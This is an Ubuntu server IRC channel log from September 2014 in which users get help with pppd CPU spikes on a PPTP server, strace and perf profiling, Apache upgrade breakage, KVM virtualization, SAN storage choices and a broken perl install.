<iclebyte2> i'm trying to use raring sources.list in a test environment but i just keep breaking deps
<dustinspringman> hey folks, I've got a problem I don't know how to google an answer for... I've got a Ubuntu 14.04 server that is effectively a PPTP aggregation point.. I have about 12 routers all connecting to this one server.. The problem I'm having is that in "top", my average load is 134%... i am pretty sure its because there are DOZENS AND DOZENS of pppd processes running.. It almost looks as if when a client disconnects/reconne
<dustinspringman> okay, i'm certain is the pppd tasks that are hosing this server... some of them have been running for 85:22:01 and such.... I can't seem to kill them either.. =/
<dustinspringman> Welp, I can kill them manually, but not using sudo killall pppd
<pmatulis> dustinspringman: maybe http://goo.gl/9e9NEq
#ubuntu-server 2014-09-02
<dustinspringman> thank you pmatulis, I'm reading into it now.
<dustinspringman> it appears, though I probably wont know for sure for a bit, that doing apt-get update and upgrade have resolved the issue.. pppd is no longer stacking up and all my clients are connecting and I'm only using 1% of my CPU now...
<pmatulis> dustinspringman: sysstat package is great for logging a history of used resources.  dstat package is good for realtime
<dustinspringman> pmatulis: thanks for that, I'll give those a shot. so far no pppd creep!
<cyclob|work> hi guys, how do i stop libreoffice 4.2 from autostarting on boot on 14.04?
<pmatulis> cyclob|work: how is that a ubuntu server question?
<cyclob|work> cause i'm running ubuntu server?
<TJ-> cyclob|work: See the channel topic, "For general (not server specific) support, try #ubuntu"
<dustinspringman> pmatulis: it came back.. but I was able to use sysstat and dstat to find the issue!
<pmatulis> dustinspringman: oh nice.  what was it?
<dustinspringman> pmatulis: pptp was using a plugin to log client connection/disconnections.. but that was eating CPU like cray cray
<pmatulis> dustinspringman: i see, you disabled it then?
<dustinspringman> pmatulis: I commented out the logging plugin from /etc/ppp/pptpd.conf and boom. 3% avg CPU load as expected.
<pmatulis> dustinspringman: sweet, nicely done
<dustinspringman> pmatulis: thanks for the tip on those tools, those are mucho helpful
<jezeniel> Any upstart users active here?
<pmatulis> jezeniel: i suppose we're all upstart users here, was'up?
<dustinspringman> jezeniel: I've been an upstart for nearly a decade! XD
<jezeniel> I just have some noob questions.. Can upstart have multiple "start on" and "stop on" clauses?
<dustinspringman> jezeniel: I'm unfamiliar with "upstart" are you talking about a specific package or is this the "boot process" you are asking about?
<firesword13> So, I'm having problems getting phpbb3 set up on 12.04.
<firesword13> I was following the guide located at https://help.ubuntu.com/community/PhpBB3
<firesword13> But when I went to start the part in the browser, I get a general error saying access is denied.
<firesword13> The threads I've found are all along the lines of "it used to work, but now it doesn't" whereas mine hasn't worked from the start.
<phuh> What do you call these things in BASH?    ${var:=xxx}  ${var:-xxx}
<firesword13> So no one has any suggestions about my phpBB3 problem?
<firesword13> Well, I suppose I'll try asking again tomorrow.
<dustinspringman> okay, thought I had this fixed, but now I an CERTAIN I know what the cause is.... when pptp clients are disconnecting (for whatever reason, gracefully leaving, service interruption, etc) my servers CPU gets a task listed in top that will eat 100% of the CPU if not killed.... obviously this is a problem! Any thoughts on how to stop pppd from eating the CPU when a client disconnects?
<lordievader> Good morning.
<Vladimir_> I need to append time/date to a file name when it arrives to a directory from a tftp client, do I have to write a bash script or what do I use?
<lordievader> Vladimir_: What do you use tftp for?
<Vladimir_> lordievader: its either tftp or sftp
<Vladimir_> but it doesn't matter, I just need to send files locally to a linux machine
<lordievader> Vladimir_: Then use sftp, I thought tftp isn't very efficient. But that might be me.
<lordievader> Vladimir_: But if the ctime does not satisfy, then you likely need to write a script that checks a folder. Throws some regex on the filenames and if they don't follow the rules change the name.
<Vladimir_> lordievader: it doesn't make any difference for me, all I need it to append date/time to the files
<Vladimir_> lordievader: alright=)
<Vladimir_> lordievader: do you know if it's possible to set that "If the file comes from a specific IP, THEN add the hostname(or a specific word)" ?
<lordievader> Vladimir_: The protocol doesn't do that, however you might find a server capable of doing so.
<Vladimir_> lordievader: okey, Oh so UDP doesn't send the source IP ?
<lordievader> Vladimir_: It does, but SFTP is only a transfer protocol. It doesn't really do management, that is left up to the server/administrator.
<Vladimir_> lordievader: ok, can the linux machine see if a specific file did come from a IP adress?
<Vladimir_> otherwise I can just set in my expect script the name of the backupfile to the hostname and then append only time/date on the linux machine(tftp server)
<lordievader> Vladimir_: If one user per host is used it can be tracked that way.
<Vladimir_> lordievader: you mean that there's only one user on the client(switch device in my case) ?
<lordievader> No, user1 maps to client1, user2 maps to client2, etc.
<Vladimir_> hmm ok
<sacarde> hi
<sacarde> do you know how remove the "clear" before login
<sacarde> in tty1
<Vladimir_> lordievader: Do I have to use any programming och bash scripting language to append timestamp to all the files coming in to a certain directory?
<lordievader> sacarde: http://askubuntu.com/questions/58097/how-can-i-remove-the-clear-screen-before-login
<lordievader> Vladimir_: Not if you take my method of regex. For <-- that bash will do fine.
<Vladimir_> okey
<sacarde> lordievader, ok, this is
<sacarde> thanks a lot
<ertyos> hello there
<ertyos> i got sendmail on existing server
<ertyos> i simply create mail account using this tutorial : http://paste.ubuntu.com/8214092/
<Vladimir_> lordievader: so I can use regex instead of ctime right?
<ertyos> but the problem is the account i created not working with mail agent (thnunderbirrd)
<ertyos> what to do ?
<lordievader> Vladimir_: Err, what I ment was that you check with a few regex if a filename complies with the rules you've set. If it doesn't you rename it (based on the ctime, or something) so it does comply with the set rules.
<Vladimir_> lordievader: lordievader: ok, but the only thing I need is a script that checks if a folder has any new files, and if they have then add the current date to the filename
<lordievader> Vladimir_: Read my answer again, it does relatively the same.
<Vladimir_> lordievader: sorry, i'm logged in on webchat.freenode, it tends to log me out every 30 minuter :/
<pmatulis> morning
<lordievader> Vladimir_: Err, what I ment was that you check with a few regex if a filename complies with the rules you've set. If it doesn't you rename it (based on the ctime, or something) so it does comply with the set rules.
<lordievader> Hey pmatulis, how are you?
<dustinspringman> pmatulis: you still here?
<pmatulis> dustinspringman: yup
<dustinspringman> pmatulis: I've got to run for now, but I've isolated the cause of the rouge pppd 100% cpu usage issue...
<dustinspringman> pmatulis: when a pptp tunnel disconnects, the pppd process starts and just eats and eats CPU... I have no idea what to do to get that to stop! I thought it was the logging plugin in the /etc/ppp/pptp.conf, but that only stopped "logged in" logs from hogging CPU.. this disconnect/log process, i've been unable to find.. =/
<patdk-wk> don't use pptp?
<patdk-wk> it's been over a decade since I know anyone that used pptp
<dustinspringman> patdk-wk: what protocol are you recommending?
<patdk-wk> ipsec?
<dustinspringman> patdk-wk: many of the routers I have to connect to this vpn aggregation point are not ipsec compatible.. =/
<patdk-wk> something that isn't ipsec compatable exists?
<patdk-wk> that I just find amazing
<dustinspringman> **requires additional licenses the customer doesn't care to pay for
<patdk-wk> what brand? I'll make sure I stay clear
<patdk-wk> but I normally use cisco, and it's included by default there
<dustinspringman> sonicwall.. they got the super low budget ones... some other guy engineered the networks, I just took them over..
<dustinspringman> pptp works fine for this purpose, its just to connect a central monitoring server to watch all the remote sites... but the server CPU spiking when a client disconnects is problematic..
<dustinspringman> gotta run, be back later.
<RoyK> dustinspringman: openvpn?
<patdk-wk> on sonicwall appliance?
<RoyK> probably not :P
<lordievader> Wasn't pptp broken? (As in insecure)
<eutheria> so i thought i would setup ipv6
<eutheria> i use dhcp to configure hosts on the network, i don't give static ip addresses
<eutheria> so openwrt and it seems to be assigning ipv6 addresses to desktop clients, but my server doesn't seems to be picking up an ipv6 address
<eutheria> do i need to enable something in the interfaces file to enable ipv6 ? i can't see anything in the man page unless i am being dumb
<eutheria> iface eth0 inet6 dhcp maybe
<Vladimir_> hello
<Vladimir_> Is it easy to change the comments color in Vim/Vi ?
<Vladimir_> I have a very irritating blue colour which I can't even se because of the black background
<jamespage> zul, this will make neutron vpn a little tricky
<jamespage> https://launchpad.net/ubuntu/+source/openswan/+publishinghistory
<jamespage> jpds_, hows your strongswan stuff coming along upstream?
<jpds_> jamespage: What bits, where?
<jamespage> jpds_, I thought that you submitted some code upstream in openstack for strongswam support in neutron?
<jamespage> maybe I was wrong
<jpds_> jamespage: I did, and it's going into Juno-3.
<jpds_> jamespage: Last I heard.
<jamespage> jpds_, awesome
<jamespage> jpds_, openswan got removed from utopic so we need an alternative
<jpds_> jamespage: Luckily most of openswan as nothing to do with strongswan.
<jpds_> jamespage: There is a problem with the precise package of strongswan which I'm working on.
<eutheria> weird iface eth0 inet6 dhcp brings up the ipv4 address
<ertyos> hello
<ertyos> i got an sendmail user which is not present on /etc/passwd is it normal ?
<ertyos> i got sendmail working user which is not present on /etc/passwd
<ertyos> is it normailL ?
<ertyos> no idea ?
<jpds_> !repeat
<ubottu> Don't feel ignored and repeat your question quickly; if nobody knows your answer, nobody will answer you. While you wait, try searching https://help.ubuntu.com or http://ubuntuforums.org or http://askubuntu.com/
<bananapie> Can I boot to a USB key from grub on a hard disk on a computer whose BIOS doesn't support booting to USB ?
<ertyos> any one there ?
<jpds_> ertyos: Yep.
<jpds_> ertyos: Personally, I don't use sendmail, I think most people use postfix.
<cfhowlett> bananapie, nope.
<bananapie> bummer.
<ertyos> don't care
<ertyos> wheter postfix or sendmail
<bananapie> My media centre ( mythbuntu ) is on an older p4 that doesn't boot from USB sticks. I want to reinstall it with 14.04 and I don't want to burn a CD. :(
<ertyos> it is someoff system related question
<zul> jamespage: where is the nova-comptue-vmware charm?
<jpds_> jamespage: zhhuabj wrote the patch for strongSwan.
<jamespage> zul, in the charm store
<zul> jamespage,  right
<eutheria> interesting dhclient doesn't register a hostname by default with ipv6
<zhhuabj> jpds, jamespage: yeah, I wrote it
<ertyos> when you create user, when the user is working correctly with your mail agent and not appearing on the file /etc/passwd and can't change that user using passwd user is it that normal or not ?
<bananapie> How often do you guys reinstall your production servers or upgrade to the next LTS ?
<eutheria> bananapie: i have a 12.04 server i have no plans to upgrade anytime soon
<eutheria> it is really down to what works for you how often you upgrade, what risks etc
<jamespage> zhhuabj, awesome - thankyou!
<zhhuabj> jamespage: K opens for spec proposals is on Sep 4 based on https://wiki.openstack.org/wiki/NeutronJunoProjectPlan
<bananapie> I found this thread on reddit, http://www.reddit.com/r/linux/comments/2f3dih/please_help_me_update_security_updates_on/ck5whbl
<bananapie> Have I misunderstood this guy's post?
<jamespage> zhhuabj, do you know whether strongswan support will land for juno?
<zhhuabj> jamespage, jpds, we  need to move strongswan neutron-spec (https://review.openstack.org/#/c/101457/)  from Juno to K after Sep 4, and push some core approver to review it and let it merge
<jpds_> zhhuabj: Problem is that leaves us VPNless for Juno.
<zhhuabj> jamepage: no, will not land for juno because Juno's spec approval deadline (SAD) is Jul 20 based on https://wiki.openstack.org/wiki/NeutronJunoProjectPlan
<zhhuabj> jamespage, jpds, for the neutron-spec https://review.openstack.org/#/c/101457/, the neutron PTL Kyle give one +2 on Jul 15, but no another core approver to merge the spec after SAD (Jul 20) has passed, so it can't catch up Juno
<zul> hallyn: ill do libvirt 1.2.8 this afternoon
<caribou> jamespage: FYI, I won't be able to attend the meeting this week
<caribou> jamespage: nothing particular to bring up though
<jamespage> caribou, ack
<eagles0513875> hey guys
<eagles0513875> i just upgraded to 12.04.1 and i am getting http://pastebin.com/9RYNWJh8
<eagles0513875> my httpd.conf file has disappeared
<eagles0513875> any ideas why
<lordievader> eagles0513875: Apache 2.2 -> 2.4? Also 12.04.1? Do you mean 12.04.5?
<eagles0513875> i have one server on 12.04.1 which upgraded to 2.4 and another on .5 and still on 2.2
<eagles0513875> O_o
<eagles0513875> should i purge apache and set it up again
<eagles0513875> and if i purge it would i lose my vhosts?
<lordievader> eagles0513875: Rather check where those packages are coming from.
<eagles0513875> not sure if a sudo do-release upgrade to .1 would make a difference
<ikonia> no
<ikonia> you've installed PPa's again
<ikonia> release upgrade won't take you to .1
<ikonia> 12.04 ships with apache 2.2
<ikonia> so you have a 3rd part repo pulling in 2.4 from soewhere
<ikonia> somewhere
<eagles0513875> ok seems like i got upgraded to 2.4
<eagles0513875> i mean to 14.04
<ikonia> yes, because you did do-release-upgrade
<eagles0513875> ok now to fix the issues
<eagles0513875> what can i do about apache with its missing httpd.conf file
<ikonia> what do you mean missing ?
<lordievader> eagles0513875: Read the documents about the differences between 2.2 and 2.4.
<eagles0513875> lordievader: the release notes?
<ikonia> we've had the discussion on 2.2/2.4 differences about 10 times now, you've also had them explained to you in #httpd
<lordievader> eagles0513875: Google: apache 2.2 vs 2.4 and you'll find all about it.
<eagles0513875> im aware of the vhost differences
<eagles0513875> but when i try and start apache i get the error apache2.conf is trying to find httpd.conf for some reason which cant be correct
<ikonia> why can't that be correct ?
<ikonia> why is the error message it's giving you "not correct"
<eagles0513875> ikonia: what im not understanding is why would it look for that file if it has been removed
<ikonia> who said it's been removed ?
<ikonia> who said this is the stock config
<ikonia> you don't really appear to be %100 sure of what you are doing with your machine, so who knows what you've done
<ikonia> eagles0513875: try actually looking at the config and see what / where it's including that file
<eagles0513875> ok
<ikonia> instead of saying "that error is wrong" fix the error
<ikonia> accept the error is correct and resolve the issue
<eagles0513875> there is # Include all the user configurations: Include httpd.conf should i comment that out?
<ikonia> eagles0513875: depends,
<ikonia> apply thought
<eagles0513875> ok
<lordievader> eagles0513875: With common-sense and a bit of Google you can go far ;)
<xibalba_> hey folks, have a few newb questions for you. whats the best, in terms of docs/compatibility/etc..., virtualization engine to use on ubuntu-server? kvm/xen?
<xibalba_> i guess whats supported right out of the box
<xibalba_> i just need 1 single physical box, running a few smaller ubuntu boxes as vms
<pmatulis> xibalba_: kvm
<xibalba_> ok, any recommended intro docs for it? i come from a heavy vmware background
<xibalba_> this looks like a good start, https://help.ubuntu.com/community/KVM
<pmatulis> xibalba_: yes, plus the ubuntu server guide
<xibalba_> anything in particular out of the server guide? i've been running unbuntu server vms for a while, just never layered on virtualization
<pmatulis> xibalba_: yes, the virtualization section.  LXC is also good
<xibalba_> LXC is similar to Docker, correct?
<xibalba_> lxc > libvirt ?
<patdk-wk> !best
<patdk-wk> !poll
<patdk-wk> damned bot
<xibalba_> ha
<patdk-wk> well, libvirt is generic
<patdk-wk> kvm is simular to esxi
<patdk-wk> lxc is like openvz
<patdk-wk> docker is build around lxc, I believe
<patdk-wk> libvirt is a generic lib, to managethem all, basically
<xibalba_> i think kvm will work best for me since its the closest thing i'm use to for now
<xibalba_> i definetly have plans to check out container based virtualization
<patdk-wk> I used to use it
<patdk-wk> gave it all up, cause of management issues
<patdk-wk> just easier to update and upgrade full vm's for me, than containers
<xibalba_> understood
<patdk-wk> lost about 15% performance, but heh
<xibalba_> yeah not super concerned on the performance side since it's just a personal box
<xibalba_> 15% lost on containers though?
<xibalba_> thats pretty significant
<sarnold> xibalba_: I think patdk-wk meant using VMs was a 15% performance loss compared to containers..
<patdk-wk> yes, loss using vmware, vs using containers
<patdk-wk> but that was before my cpu's where ept enabled
<patdk-wk> likely only 10% loss now
<xibalba_> ah ok
<xibalba_> yeah our procs at work at so beefy its neglible
<patdk-wk> heh, I have new 24core dual socket systems
<patdk-wk> they are not beefy enough
<patdk-wk> 24core 2.9ghz I think they are
<patdk-wk> ah, 2.7ghz
<sarnold> very nice
<patdk-wk> ms sql with 3tb db (spanned over 48 ssd's) still ownes the box
<xibalba_> that is a beeeeeefy database
<xibalba_> whats running on it
<patdk-wk> everything the batch job gets queued up, vmware shifts all load from that box, to the others :)
<patdk-wk> just batch processing
<patdk-wk> just recomputing all data links every month
<patdk-wk> as more infomation comes in, or gets more accurate
<sarnold> ahhh, that's why 48 ssds rather than fusionio, heh?
<patdk-wk> so we can't depend on the last links to be accurate or valid
<patdk-wk> as they where only the best guess at that time
<patdk-wk> we looked at fusionio
<patdk-wk> just didn't pan out as a workable solution
<patdk-wk> this is actually a pure system
<patdk-wk> so the san ssd backs all the esxi hosts
<xibalba_> are you using RDMs for that DB ?
<patdk-wk> no
<xibalba_> is your DB spread across multiple VMDKs then?
<patdk-wk> ya, like 10 :)
<xibalba_> also do you prefer NFS or iSCSI for mounting your SAN to your ESXI boxes? and why
<patdk-wk> well, considering, nfs sucks for that workcase?
<xibalba_> other than, my SAN doesn't support NFS thats what a NAS is for =P
<patdk-wk> nfs is limited to a single ip connection
<xibalba_> does it?
<patdk-wk> so you want to limit it to 10gbit?
<xibalba_> ah so you're using multipathing?
<patdk-wk> well, 4 fc channels
<xibalba_> ok, we took a slightly different approach to our NFS mounts. By mounting the volumes from the NAS on off-by-one IPs and using IP HASH as the port-channel alogirthm on the switches
<xibalba_> so 192.168.1.220:/vol1
<xibalba_> 192.168.1.221:/vol2
<xibalba_> etc
<patdk-wk> yes, but your still limited to a single nic port per nfs mount
<patdk-wk> there is no way to fix that
<xibalba_> correct, not till pnfs4
<xibalba_> http://www.pnfs.com/
<patdk-wk>  Ialso dislike the additional overhead of svmotion on nfs
<xibalba_> oh w/out VAAI support you mean?
<patdk-wk> you can have vaai support on nfs?
<xibalba_> i believe so, on the netapps
<patdk-wk> on nfs? I understand iscsi
<xibalba_> https://library.netapp.com/ecmdocs/ECMP1237939/html/html/GUID-735E5961-E3FB-4105-A8F8-37F6444B68BC.html
<xibalba_> Installing the NetAppÂ® NFS Plug-in 1.0.20 for VMwareÂ® VAAI
<patdk-wk> but scsi vaai commands, I don't see how that can exist on nfs
<patdk-wk> heh, plugin :)
<xibalba_> yeah
<patdk-wk> not real vaai, but a vaai emulator
<xibalba_> correct
<patdk-wk> nope, I dropped all my netapps
<xibalba_> oh?
<patdk-wk> but I notice, vmware when it svmotions a vmdk, it will just move the data, if it's thin, it just moves what you expect
<xibalba_> quick backwards tangent : in this doc, https://help.ubuntu.com/community/KVM/Installation , i see references to 10.04/9.10, is it outdated?
<patdk-wk> but on nfs, it reads it as if it's thick, then writes it as thin
<xibalba_> ^ yes i hate this !
<patdk-wk> so a 1tb empty vmdk on nfs, takes forever :(
<xibalba_> it causes SDRS to take much longer than it should
<patdk-wk> and my last issue with nfs, why I discounted it in my first attempts to use it
<patdk-wk> was no sioc
<xibalba_> ah we've got SIOC on our NS
<patdk-wk> I keep having a single vm, pounding the nfs disks, and causing the others not to get reasonable io
<xibalba_> though i dont think the SIOC is properly working
<xibalba_> as i've had the same observation as you
<patdk-wk> well, I don't even know of esxi does that now, I did these tests in 4.0 was released :)
<patdk-wk> iscsi is more to deal with, but it seems to solve my isuses, so I'm happy :)
<patdk-wk> or I just use fc directly
<xibalba_> yeah the config is more involved, but its only one time
<patdk-wk> two clusters use fc, one uses iscsi, and one uses das (with iscsi for just when upgrading)
<patdk-wk> actually, since the multipath vmotion, it's really the same
<patdk-wk> make 1 nic per port for vmotion and iscsi, repeat
<xibalba_> yup
<xibalba_> should KVM be mentioned here in the list: https://help.ubuntu.com/14.04/serverguide/virtualization.html
<patdk-wk> it is
<patdk-wk> linking to kvm would be useless
<patdk-wk> as it's just a processer instructions
<patdk-wk> pointing to qemu would be more useful, as it's the program that actually uses kvm
<patdk-wk> but they link instead to the usermanagement interfaces to those tools
<patdk-wk> being libvirt, or ubuntu cloud, ...
<zul> hallyn: your cgmanager patch fails with 1.2.8
<hallyn> zul: leave the patch commented out and sling over the .dsc
<xibalba_> im reading through this KVM doc, http://www.howtogeek.com/117635/how-to-install-kvm-and-create-virtual-machines-on-ubuntu/, and i'm looking for something thats more command line oriented. so i can run it on a server at my colo w/out having to do X11 fwding to my desktop
<TJ-> xibalba_: virsh and libvirt might be what you're looking for
<xibalba_> k i found this and it looks more cli;
<xibalba_> http://www.howtoforge.com/virtualization-with-kvm-on-ubuntu-12.10
<xibalba_> can i get more VMs out of my host w/KVM vs VirtualBox?
<xibalba_> since KVM has a shared kernel space
<Seranok> how do i determine why a cURL request is taking 5-15 seconds from my server?
<Seranok> it only takes < .2 seconds from my browser
<Seranok> is there a request queue?
<sarnold> Seranok: are your browser and curl running on the same machine?
<Seranok> sarnold: no
<Hen0k> ..
<sarnold> Seranok: does one have an IP that resolves quickly and the other have an IP that doesn't resolve quickly or doesn't resolve at all?
<Seranok> sarnold: no, i tried pinging from both machines, takes the same amount of time
<Seranok> that's why i'm wondering if there's some http request queue or i'm being throttled
<sarnold> Seranok: I'm curious if your web server is trying to do reverse lookups on the IPs; from the server, run 'host <ip>' for each IP of your clients
<Seranok> what would that show?
<sarnold> Seranok: if one resolves instantly and the other doesn't resolve at all, then I'll say "go turn off domain name logging in your access.log"  :)
<Guest79575> I have trouble with firewall I setup using UFW on 14.04 server on AWS/EC2: 'ufw status' firewall is enabled, rules look good to I can SSH into the machine, but on reboot I cannot get back in. So I stop the instance, detach the root volume, and re-attach and mount it on another machine where I disable UFW on startup, then re-attach to the first machine and boot it and SSH in fine, activate UFW and still SSH in fine, reboot and
<Guest79575>  again I cannot SSH in.  Did something change here between 12 and 14?
<sarnold> Seranok: if both resolve instantly or both fail to resolve, it'll mean someone else needs to take a crack at your question :) hehe
<Seranok> sarnold: i think that's the issue
#ubuntu-server 2014-09-03
<jdstrand> Guest79575: there were changes, but not something that you would need to do differently to have it enabled on boot
<jdstrand> Guest79575: can you file a bug at https://bugs.launchpad.net/ubuntu/+source/ufw/+filebug ?
<Guest79575> jdstrand: if I can narrow something down I will file a bug, am trying to reproduce locally with vagrant
<jdstrand> ok, thanks
<wmp> hello, i very need help with networking
<Guest79575> jdstrand: it's wierd and may have to do with EC2 so I don't want to jump to conclusions
<wmp> becouse my server is donw
<wmp> http://pastebin.com/TPeqPELc - i thying to run this bridge
<wmp> serer works good on normal eth0 inet static
<wmp> but when i trying make bridge, it down...
<jdstrand> Guest79575: I was wondering if the security groups might be interfering (or some other software in the guest)
<Guest79575> jdstrand: yea I wondered that as well - but they didn't change in the sequence of events I outlined before
<Guest79575> i.e. they always allowed TCP port 22 from anywhere
 * jdstrand nods
<Guest79575> jdstrand: FWIW I just reproduced the issue locally with vagrant VM
<jdstrand> Guest79575: ok. can you file a bug with steps to reproduce?
<Guest79575> jdstrand: I'm going to retry with Precise first but if that works then yes
<jdstrand> thanks
<dustinspringman> server 14.04... when a client disconnects from pptp on the server, cpu spikes to 100% for that task.... any thoughts on how to stop this?
<Patrickdk> restart pptp on 100% cpu usage?
<Patrickdk> :) not sure, so haven't used pptp for so long
<dustinspringman> Patrickdk: all I have to do to remedy the issue is kill the pppd task in top... but whenever a client disconnects.. boom.. 99% load until its kilt
<Patrickdk> heh? you said pptp would go 100%
<Patrickdk> now it's pppd?
<Patrickdk> that sounds easy to fix
<dustinspringman> it's pppd in the task list on top.. but it's a pptp server i'm operating.. the client is a pptp client that disconnects and sends pppd into a spiral
<Patrickdk> yes, sounds like a pppd problem
<Patrickdk> so look for a pppd solution
<dustinspringman> been doing that... there's all sorts of random stuff on the web.. logs don't say much..
<Patrickdk> what does strace say?
<dustinspringman> I've been chasing ghosts through the pptp.conf for a while.. got rid of half the problem.. (it was doing the same thing when users connected, but i disabled the logwtch in pptpd.conf and that went away)..
<dustinspringman> hmm.. strace looks interesting... i'll see what it has to offer
<dustinspringman> wow, I have no idea how to use this! XD
<Patrickdk> you wouldn't :)
<Patrickdk> a programmer would
<Patrickdk> or atleast someone that understood programming
<Patrickdk> but if it's using 100% cpu, it should give a good hint
<dustinspringman> uh oh... i've gotten it stuck in some sort of gobbley gook and can't CTRL+C out of it.. XD
<Patrickdk> heh?
<Patrickdk> control-c should work
<Patrickdk> but your terminal is probably screwed up
<Patrickdk> after control-c, try typing in reset, and press enter
<dustinspringman> }'}"}(}"ï¿½}*~~ï¿½}#ï¿½!}!}-} }4}"}&} } } } }%}&ï¿½)}2}=}'}"}(}"ï¿½}*~~ï¿½}#ï¿½!}!}-} }4}"}&} } } } }%}&ï¿½)}2}=}'}"}(}"ï¿½}*~
<dustinspringman> that's all I'm getting.. =/
<dustinspringman> every now and again I get this: socket(PF_LOCAL, SOCK_DGRAM|SOCK_CLOEXEC, 0) = 7
<dustinspringman> connect(7, {sa_family=AF_LOCAL, sun_path="/dev/log"}, 110) = -1 ENOENT (No such file or directory)
<dustinspringman> close(7)                                = 0
<dustinspringman> gettimeofday({1409712235, 73661}, NULL) = 0
<dustinspringman> fcntl(6, F_SETLKW, {type=F_WRLCK, whence=SEEK_SET, start=316, len=1}) = 0
<Patrickdk> how exactly did you run strace?
<Patrickdk> you didn't strace -p *the pid of the pppd that is using 100% cpu*
<dustinspringman> sudo strace pppd
<Patrickdk> that is not going work
<Patrickdk> that is just running pppd on the console
<Patrickdk> that is suppost to happen
<dustinspringman> oh,. so, how do I get out of this?
<Patrickdk> well, the problem is you need to get out of pppd :)
<Patrickdk> probably control-d
<dustinspringman> ctrl+d /anything does nothing..
<dustinspringman> open another term and kill something?
<Patrickdk> control-z ?
<Patrickdk> sure :)
<Patrickdk> only option now, that I can think of
<dustinspringman> hah.. so... now what should I kill!? I don't see strace anywhere... or pppd...
<Patrickdk> ps ax
<dustinspringman> that got it!
<dustinspringman> whew!
<pmatulis> dustinspringman: still banging away at it?
<dustinspringman> pmatulis: yea man.... I've isolated the issue.. just can't seem to find the smoking gun...
<dustinspringman> pmatulis: I got rid of the connection logging that was eating CPU, now I just have the "disconnect of pptp client causes pppd task to spike CPU" issue...
<dustinspringman> pmatulis: I've read every thread on the web I can find...
<dustinspringman> pmatulis: some talked of "address loops" and such, but I've checked on that, doesn't appear to be the issue... its got to be something in the pptpd.conf file that is trying to "do something" when the pptp connection to a client drops.. .but what that "doing" is, is eluding me..
<Patrickdk> what that is, is what strace will show you
<Patrickdk> start a connection
<Patrickdk> attach strace to it
<Patrickdk> then disconnect
<Patrickdk> and strace will show you what happens
<Patrickdk> then you just have to figure out the cause vs the effect
<dustinspringman> Patrickdk: i'll dig into that a bit more and see what I can come up with.. The syntax for strace is cray cray
<pmatulis> dustinspringman: 'strace -f -o <output_file.strace> -p <pid of your process>'
<Patrickdk> maybe, but probably not needed yet, -s 4096, or so
<dustinspringman> pmatulis: Patrickdk: I'll give that a shot in a bit.
<pmatulis> dustinspringman: the perf utility will probably help you more in your situation
<pmatulis> sudo apt-get install linux-tools-generi; <start your process>; sudo perf record -g -p <pid>; reproduce problem; <stop perf>; sudo perf report -g
<pmatulis> linux-tools-generic*
<sarnold> pmatulis: ooh. thanks for quick tutorial :)
<pmatulis> sarnold: lol
<sarnold> pmatulis: no, seriously, "learn about perf" has been on my todo list for bloody ever
<sarnold> now I have it up and running and am impressed :)
<pmatulis> sarnold: well now you know :)
<pmatulis> obviously it generates a default named output file (perf.data) that can be specified with '-o'
<pmatulis> there's a lot more but that is the basic stuff.  and i'm no expert
<sarnold> pmatulis :D
<Patrickdk> haven't heard of or used perf before
<Patrickdk> but since I know the kernel, and programming good, strace makes perfect sense to me :)
<sarnold> Patrickdk: strace is awesome but there's a lot it misses.. it doesn't show functions inside a program, which can be really helpful, and it doesn't show functions inside the kernel, which can be helpful, and it is a bit .. blunt .. when trying to find program hotspots
<Patrickdk> ah ya, it's not a profiler
<Patrickdk> it's a hmm, what is the word
<Patrickdk> syscall dumper
<user123321> Please help, my machine again crashed at 10.10 display time with no response, recovered with ctrl+alt+prtsc+R+I+U+S+B. Kernel log around that time: http://pastebin.com/dkS92jui
<sarnold> user123321: anything before that?
<Valduare> hi guys i just upgraded from 12.04 to 14.04 and the system is badâ¦.. seems to be issue with perl. I cant install anything complains of perl stuffâ¦ looking around there are no files in /usr/lib/perl
<Valduare> how can I fix this
<user123321> sarnold,  09:05:00 <---- it's the previous one before the first log entry I posted.
<user123321> seems one hour before.
<sarnold> user123321: wait, is that "ubuntu 10.10" aka "maverick" aka "end of lifed over two years ago"?  Or is that just saying at 10:10 it hung....
<sarnold> user123321: ah, okay
<user123321> sarnold, Oh I mean, it hanged at 10.10 display time :D
<sarnold> user123321: okay, good... I just googled for that memory address you found and people running 10.10 were complaining about it... I got worried that you were two years behind on security updates :)
<user123321> oh lol
<sarnold> interesting if true https://bbs.archlinux.org/viewtopic.php?pid=1350836
<user123321> interesting indeed! hmm.
<sarnold> and definitely interesting:  https://bugzilla.kernel.org/show_bug.cgi?id=16661  :)
<uvirtbot> sarnold: Error: Could not parse XML returned by bugzilla.kernel.org: HTTP Error 404: Not Found
<sarnold> uvirtbot: the downside is... the kernel.org bugzilla gives me the feeling that this message is probably unrelated to your actual lockup, or perhaps a symptom of a different underlying problem..
<uvirtbot> sarnold: Error: "the" is not a valid command.
<sarnold> sigh you stupid virtbot
<user123321> sarnold,  It be same in Ubuntu and LUbuntu right? Because I'm in LUbuntu now.
<user123321> It should be*
<sarnold> user123321: so, here's a long-shot theory. it's not great. perhaps there's some electrical issue with your NIC; the connection bounced at about the same time, perhaps a lose wire wiggled or the machine moved around slightly causing electrical connections to come and go and wedge the machine
<sarnold> user123321: (My dad's dell had this problem, the gigabit card we bought wouldn't work, he's stuck with onboard 100mbit ethernet as a result..)
<user123321> sarnold, Oh the ethernet, I restarted my router a while before the crash. That's why eth0 restart is displayed in logs.
<sarnold> dang :)
<Valduare> how can I install POSIX.pm via command line
<sarnold> well, that's probably good. it'd be replace motherboard or something if it were broken..
<sarnold> Valduare: could be horrible. try "apt-get install perl-base" and see if you get lucky...
<sarnold> user123321: you're probably going to have to try to collect more data next time it happens. have a ps auxw running or use a serial console or something similar...
<sarnold> well, you did get the sysrq messages, it was alive enough for that..
<Valduare> apt dosnt want to work without perl fully functional
<eagles0513875> hey guys is there a way i can see all the apache redirects i have on my system
<user123321> sarnold, Yeah, how to get more data? Are there any logs I can check now? :D
<sarnold> Valduare: dang. okay, look in /var/cache/apt/archives for perl* debs
<Valduare> Can't locate POSIX.pm in @INC
<sarnold> user123321: maybe next time it hangs, use sysrq to dump task info and stack traces
<Valduare> ya I have the deb in the cache
<sarnold> Valduare: sweet; try do dpkg --install the thing
<user123321> sarnold, any idea of the exact buttons? https://www.kernel.org/doc/Documentation/sysrq.txt <--- this shows a lot I bet
<sarnold> user123321: https://www.kernel.org/doc/Documentation/sysrq.txt
<sarnold> hahaha
<user123321> lol
<sarnold> user123321: l m d w   probably the starting point
<Valduare> ah progress
<user123321> sarnold, cool
